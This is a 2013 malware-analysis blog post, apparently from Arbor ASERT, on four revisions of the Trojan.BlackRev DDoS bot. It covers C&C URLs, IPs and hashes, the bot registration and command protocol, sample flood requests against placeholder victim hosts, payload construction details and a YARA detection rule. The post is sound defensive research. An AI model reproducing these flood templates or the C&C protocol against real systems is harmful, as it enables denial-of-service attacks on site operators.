The Latest in IT Security

The Revolution Will Be Written in Delphi

21
May
2013

Since it has been a little while since we profiled a DDoS botnet family on the blog, let’s take a look at Trojan.BlackRev (also known as the “Black Revolution” trojan.) It was named for the Mutex set in early versions of the malware. This family is interesting from a research perspective because there are at least four revisions in the wild showing its progression from a basic DDoS bot to a more advanced one.

Revision MD5 C&C URL C&C IP
1 06d8da1e14cff81ca2fad02d2a878c72 http://userhaos.ru/113/bot/gate.php 91.105.232.105
2 c9c6aeacee9f973ca0ca5da101a12a16 http://ergoholding.ru/rev/gate.php 91.204.122.100
2.5 7141cacc3f4a191015a176947a403b79 http://clfrev.ru/rev/panel/gate.php 93.170.130.112
3 eae553d72142f9dcb06c5c134015fe7a http://ergoholding.ru/ddd/gate.php 91.204.122.100

The programming language used is Delphi (networking support via the Synapse library), PEiD detects it as version “6.0 – 7.0″ and the Interactive Delphi Reconstructor (IDR) confirms version 7.

As an aside, the latter tool’s IDC Generator helped significantly in reverse engineering these binaries in IDA Pro, thanks much!

Based on the Delphi usage, command and control locations, and the language references in some of the HTTP headers, the nationality of this family is empirically Russian. But, as with all malware attribution, this is highly speculative. It is also unclear whether a single threat actor has access to the source code or whether the code has been released or leaked and multiple actors are making modifications.

Revision 1

Revision 1′s command and control (C&C) is HTTP based. Bots register to the C&C using a request like this:

GET /113/bot/gate.php?reg=lemaaapuzg HTTP/1.0
Host: userhaos.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The reg parameter value is set to 10 random lowercase letters.

Here is how bots poll for commands:

GET /113/bot/gate.php?cmd=urls HTTP/1.0
Host: userhaos.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The C&C will respond with a “|” delimited message:

command|unknown_integer|unknown_integer2|target|query string or port|

Identified commands:

  • stop – stop attack
  • die – terminate bot process
  • sleep – sleep for one hour
  • http – HTTP GET request flood #1
  • simple – HTTP GET request flood #2
  • loginpost – HTTP POST request flood #1
  • datapost – HTTP POST request flood #2

The following DDoS attacks are implemented in this revision.

Attack – http

A HTTP GET request flood. Here is a sample request:

GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 266
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset:\twindows-1251,utf-8;q=0.7,*;q=0.3
Referer: http://victim.com/
Cookie:\tPHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4;

__utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

The Keep-Alive header will be set to a random integer between 0 and 300. The rest of the headers are static.

Attack – simple

A barebones HTTP GET request flood. It uses Synapse’s default GET request and looks like this:

GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Attack – loginpost

A HTTP POST request flood. The POST request will look like:

POST /index.html HTTP/1.0
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: text/html
Content-Length: 25

login=gxt1$pass=svw3re1aq

The login and pass parameters are separated by the “$”. Both values are set to random lowercase letters and digits. The lengths will be chosen randomly between 0 and 15 characters each.

Attack – datapost

A HTTP POST request flood. A sample request:

POST /index.html HTTP/1.0
Host: victim.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: text/html
Content-Length: 895

r8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vs

jr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsjr8vsj

For the POST data, a string of lowercase letters and digits is generated. The length will be randomly chosen between 0 and 150. This string will then be repeated 179 times.

Revision 2

Revision 2 of Trojan.BlackRev modifies the C&C communications slightly. The reg parameter is set to 15 random lower and uppercase letters and it uses the following User-Agent:

User-Agent: Mozilla/4.0 (SEObot)

The following layer 4 attack commands were added:

  • syn – TCP connection flood
  • udp – UDP flood #1
  • udpdata – UDP flood #2
  • data – TCP flood
  • icmp – ICMP echo request floods

This revision implements revision 1′s http, simple, loginpost, and datapost attacks with the only difference being that in the latter three, the User-Agent used is:

User-Agent: Mozilla/4.0 (SEObot)

The following are the details of the additional DDoS attacks.

Attack – syn

Per the name, this is supposed to be a TCP SYN flood, but behind the scenes, a TCP connection flood is implemented-complete 3-way handshake.

Attack – udp

A UDP flood where the payload is 16 “F”s.

Attack – udpdata

A UDP flood where the payload is 100 random lowercase letters.

Attack – data 

A TCP flood. For the payload, a string of random lowercase letters with a random length of 0 to 100 is generated. This string is repeated 172 times. The concatenated string is then repeated again 35 times.

Attack – icmp

An ICMP echo request or Ping flood. The payload is 44 “7″s.

Revision 2.5

C&C-wise, revision 2.5 is very similar to revision 2. It changes the following commands:

  • http
  • udp
  • udpdata
  • data

This revision adds:

  • tcpdata – TCP flood #1
  • dataget – HTTP GET request flood
  • connect – TCP flood #2
  • dns – resolve IPs

Attack – http

Example request:

GET /index1.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 176
Connection: keep-alive
User-Agent: Android-x86-1.6-r2 – Mozilla/5.0 (Linux; U; Android 1.6; en-us; eeepc Build/Donut) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3
Referer: https://www.google.ru/#hl=ru&gs_rn=9&gs_ri=psy-
ab&tok=TBFEIC6g9ZD8TLHI_O_qEw&cp= 5&gs_id=i&xhr=t&q=www.victim1.com&es_nrs=true&pf=p&newwindow=1
&safe=off&output=search&sclient=psy-
ab&oq=site.&gs_l=&pbx=1&bav=on.2,or.r_cp.r_qf. &bvm=bv.45175338,d.bGE&fp=364d6440e7471a0b&biw=
1360&bih=624
Cookie: PHPSESSID=66lf4vv9l8W7engCw6hFmLWShuKAMMuqJICAxiLekLrmAnnmiJ

The Keep-Alive header will be set to a random number between 0 and 300. The Cookie header will be set to “PHPSESSID=” with a value of 50 random uppercase, lowercase, and digits. This revision selects a random User-Agent out of the following 11 possible:

  • Yandex/1.01.001 (compatible; Win16; I)
  • Yandex/1.01.001 (compatible; Win16; P)
  • Yandex/1.02.000 (compatible; Win16; F)
  • Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
  • Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)
  • StackRambler/2.0 (MSIE incompatible)
  • StackRambler/2.0
  • Android-x86-1.6-r2 – Mozilla/5.0 (Linux; U; Android 1.6; en-us; eeepc Build/Donut) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2
  • Samsung Galaxy S – Mozilla/5.0 (Linux; U; Android 2.1-update1; ru-ru; GT-I9000 Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko)
  • Samsung Galaxy Tab 10.1 Android 3.1 – Mozilla/5.0 (Linux; U; Android 3.1; en-us; GT-P7510 Build/HMJ37) AppleWebKit/534.13 (KHTML, like Gecko)
  • Blackberry OS ?? 4.2 ?? 5 ?????? ? BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179

The rest of the headers are static, including the very specific Referer.

Attack – udp

The UDP payload is interesting. It is 76 bytes in length, and looks like tcpdump output:

[udp sum ok] 60865 FormErr% [0q] 0/0/0 (12) (DF) (ttl 253, id 9987, len 40)

ASERT team member Matt Bing speculated that it might have been copied and pasted from the tcpdump output in this 2005 article on “Understanding the UDP Protocol”

Attack – udpdata

The payload in this variant is 342 “F”s.

Attack – tcpdata

This is a new attack, a TCP flood. The payload is generated like this: a string of 100 random lowercase letters is generated. This string is repeated 172 times. Then, the concatenated string is repeated 35 times.

Attack – data 

The data command was changed to launch both the udpdata and tcpdata attacks.

Attack – dns 

Repeatedly tries to resolve the target IP via gethostbyaddr() function calls.

Attack – dataget 

A new HTTP GET request flood. Example request:

GET /index10.html?
xf29jgj0jwnpl7ivtp4gkrelbj6dm4qsg7x62x7c3u17k9mrpd6k8bgwcpmdrhykhyi8fhcxj5ry0jbwjgo1tqb7645m9ix27
jk9dx1lgq9uj89dme0fp8b0wrknmnk9yieybrhpsd005s5hpwerv1=xf29jgj0jwnpl7ivtp4gkrelbj6dm4qsg7x62x7c3u1
7k9mrpd6k8bgwcpmdrhykhyi8fhcxj5ry0jbwjgo1tqb7645m9ix27jk9dx1lgq9uj89dme0fp8b0wrknmnk9yieybrhpsd00

5s5hpwerv1$….more of the same… HTTP/1.1
Host: www.victim10.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (SEObot)

The query string is quite long; it is constructed like this: a string of 150 random lowercase letters and digits is generated. This string is used for 18 name/value pairs. At the end, an additional name/value pairs is added where the values is the random string repeated 53 times. Each name/value pair is separated by a “$”.

Attack – connect 

A new attack, a TCP flood. On each send() iteration a string of 10 random lowercase letters is generated and appended to the previously generated string. A newline is concatenated to the end.

Revision 3

Revision 3 changes things up a bit. The analyzed binary phones home to the same C&C domain and IP as revision 2, but bot registration now looks like this:

GET /ddd/gate.php?id=idbucwehjhhgjjxxe HTTP/1.0
Host: ergoholding.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The id parameter will be set to “id” plus 15 random lowercase letters.

Commands in this revision are polled via:

GET /ddd/get HTTP/1.0
Host: ergoholding.ru
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

The C&C response is still pipe delimited, but different:

command|number_of_packets_to_send|URL, IP, hostname, or stop

There are some deletions, additions, and changes to the command set.

Commands removed:

  • die
  • sleep
  • syn
  • udpdata
  • tcpdata
  • data
  • dataget
  • connect

Commands added:

  • exec – download and execute
  • resolve – hostname resolution flood
  • antiddos – HTTP GET request flood – favicon.ico
  • range – HTTP GET request flood – Range header
  • ftp – FTP connection flood
  • download – HTTP GET request flood
  • fastddos – HTTP GET request flood – WinInet functions
  • slowhttp – HTTP GET request flood – possible Slowloris attempt
  • allhttp – launches multiple HTTP floods
  • full – launches multiple floods

Commands changed:

  • http
  • simple
  • loginpost
  • datapost
  • udp

Commands that stayed the same:

  • icmp
  • dns

Below are revision 3′s attacks.

Attack – http

The http attack changed. It is now a HTTP GET and POST flood. The GET request:

GET /index.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 162
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim1.com/index.html

And the POST:

POST /index.html HTTP/1.1
Host: www.victim1.com
Keep-Alive: 162
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim1.com/index.html
Content-Length: 87664

In both, the Keep-Alive header will be set to a random number between 0 and 300. In the POST, the Content-Length header is set to a random number between 0 and 300,000

Attack – simple

The simple attack is slightly different:

GET /index.html HTTP/1.1
Host: www.victim2.com
Connection: close
User-Agent: Opera/9.80

The User-Agent header looks to be a copy and paste typo. This User-Agent is used in some additional attacks as well.

Attack – loginpost

In addition to the below POST request, a simple flood is also started.

POST /index.html HTTP/1.1
Host: www.victim3.com
Connection: close
User-Agent: Opera/9.80
Content-Type: text/html
Content-Length: 28

login=g84lkvpk&pass=uOjzq9FJ

Slight differences: the parameters are separated by a “&” instead of a “$” and the values are each set to eight random lowercase letters and digits.

Attack – datapost

A POST request where the data is 100 random lowercase letters.

POST /index.html HTTP/1.1
Host: www.victim4.com
Connection: close
User-Agent: Opera/9.80
Content-Type: text/html
Content-Length: 100

bulwmxcytltvczbrgqoedffycczkyedrmoczlkhgjghmwdnveinkkzgncvtojsxhlchddzebspuwcsdeydalowdcewdxrllgzvvt

Attack – udp

The UDP flood routine no longer uses the Synapse Library in this revision. Winsock is used instead. Port 80 is hardcoded and the payload is only two “F”s.

Attack – resolve

Repeatedly tries to resolve the target hostname via gethostbyname() function calls.

Attack – antiddos 

A HTTP GET request flood. Two requests are sent on each iteration, the first one being:

GET /index.html HTTP/1.1
Host: www.victim2.com
Keep-Alive: 150
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto36rucgccrlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim2.com/index.html

The second:

GET /index.html/favicon.ico HTTP/1.1
Host: www.victim2.com
Keep-Alive: 47
Connection: keep-alive
Cookie: s=nfa578n8ichp3eep45j22f5; PHPSESSID=qto3e45h4rlurdncrg4lsdu6; selected_language=Russian; dle_compl=0
User-Agent: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://www.victim2.com/index.html

The Keep-Alive header is set to a random number between 0 and 300. favicon.ico is automatically added in the second request.

Attack – range

A HTTP GET request flood with a Range header. Possibly an attempt at an ARME/Apache Killer style attack. Sample request:

GET /index.html HTTP/1.1
Host: www.victim4.com
Connection: close
Range: bytes=41-73915
User-Agent: Opera/9.80

The Range start value is a random value between 0 and 100. The stop value is a random value between 0 and 100,000.

Attack – ftp

A FTP connection flood. A sample session:

200 OK
USER 7g6jo5ircx
331 password
PASS s1pvu9yx0r
200 OK
TYPE I
200 OK
STRU F
200 OK
MODE S
200 OK
REST 0
200 OK

The USER and PASS will both be set to 10 random lowercase letters and digits. 

Attack – download

A basic HTTP GET request flood:

GET /1.exe HTTP/1.0
Host: www.victim7.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Attack – fastddos

A HTTP GET request flood using the WinInet functions:

GET /index.html HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: google
Host: www.victim8.com
Cache-Control: no-cache

Notice the interesting User-Agent.

Attack – slowhttp

A HTTP GET request flood. Possibly an attempt at a Slowloris attack, but it is not slow at sending data. Here’s what the request looks like:

GET /9.html HTTP/1.0
Host: www.victim9.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)‘=

Attack – allhttp

Launches the following attacks:

  • simple
  • http
  • range
  • loginpost
  • download
  • datapost

Attack – full

Launches the following attacks:

  • icmp
  • udp
  • datapost

Miscellaneous

Besides the C&C and DDoS attacks there are some additional differences and features among the revisions:

  • All four revisions spawn a thread that tries to maintain a small memory footprint via calls to SetProcessWorkingSetSize().
  • Revisions 1 and 2.x try to revoke discretionary access control list (DACL) rights to its binary.
  • Revisions 1 and 2.x enumerate a bunch of directories and then removes files and kills processes based on some tests. The referenced analysis below indicates this might be “botkiller” code.
  • Revision 2.x verifies the embedded C&C by calculating a hash on the URL and comparing it to a hardcoded hash value.
  • Revision 2.x has some built-in monitoring/debugging functionality where the attack commands are echoed back to the C&C via a HTTP GET request to monitor.php.
  • Revision 3 was the first binary to be packed-UPX.
  • Revision 3 maintains persistence via the Registry Run method.
  • The code organization and layout of revision 3 also differs a bit from the other three.

Most of these code paths were glossed over during reversing and a detailed analysis of them are left as an exercise for any interested readers. There is a Russian language malware analysis of revision 2 by the “onthar.in Malware Research Laboratory” that takes a closer look at some of the above and also at an associated dropper malware. It is available at http://onthar.in/articles/black-revolution-ddos-bot-analysis/ (Google Translate does an okay job.)

ASERT has been using the following YARA rule to detect this malware family in our malware zoo:

// blackrev

// Dennis Schwarz, Arbor Networks ASERT
// April 2013

rule blackrev
{
strings:
$base1 = “http”
$base2 = “simple”
$base3 = “loginpost”
$base4 = “datapost”

$opt1 = “blackrev”
$opt2 = “stop”
$opt3 = “die”
$opt4 = “sleep”
$opt5 = “syn”
$opt6 = “udp”
$opt7 = “udpdata”
$opt8 = “icmp”
$opt9 = “antiddos”
$opt10 = “range”
$opt11 = “fastddos”
$opt12 = “slowhttp”
$opt13 = “allhttp”
$opt14 = “tcpdata”
$opt15 = “dataget”

condition:
all of ($base*) and 5 of ($opt*)
}

Conclusion

As we have seen, Trojan.BlackRev is very much a DDoS-specific bot with a rich set of attacks. There are certainly signs that circa April 2013 the code was under active development and the associated campaigns were likely test runs. In addition, the onthar.in analysis notes that they haven’t seen this malware being sold on the underground forums yet. It will be interesting to see how this family will evolve and how active it will become in the wild.

Leave a reply


Categories

FRIDAY, NOVEMBER 24, 2017

Featured

Archives

Latest Comments

Social Networks